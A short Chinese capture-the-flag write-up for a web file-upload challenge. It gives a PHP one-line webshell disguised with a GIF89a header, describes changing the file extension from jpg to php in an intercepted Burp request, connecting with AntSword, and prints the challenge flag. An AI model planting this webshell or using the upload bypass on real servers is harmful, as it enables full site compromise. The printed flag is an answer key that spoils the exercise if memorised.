攻防世界-web进阶-upload1
进去之后让上传东西,想上传一个一句话木马,发现只让上传图片格式的,并有前端过滤
那我们把一句话写到一个文本文件里,再把后缀名改为jpg
GIF89a <script language="php">eval($_POST['shell']);</script>
上传,bp拦截包,改包,将后缀名由jpg改为php,上传成功后会返回一个路径,
蚁剑连接
连接成功
flag出
cyberpeace{bb154f23ac9e14abb2da5e22a7c7936d}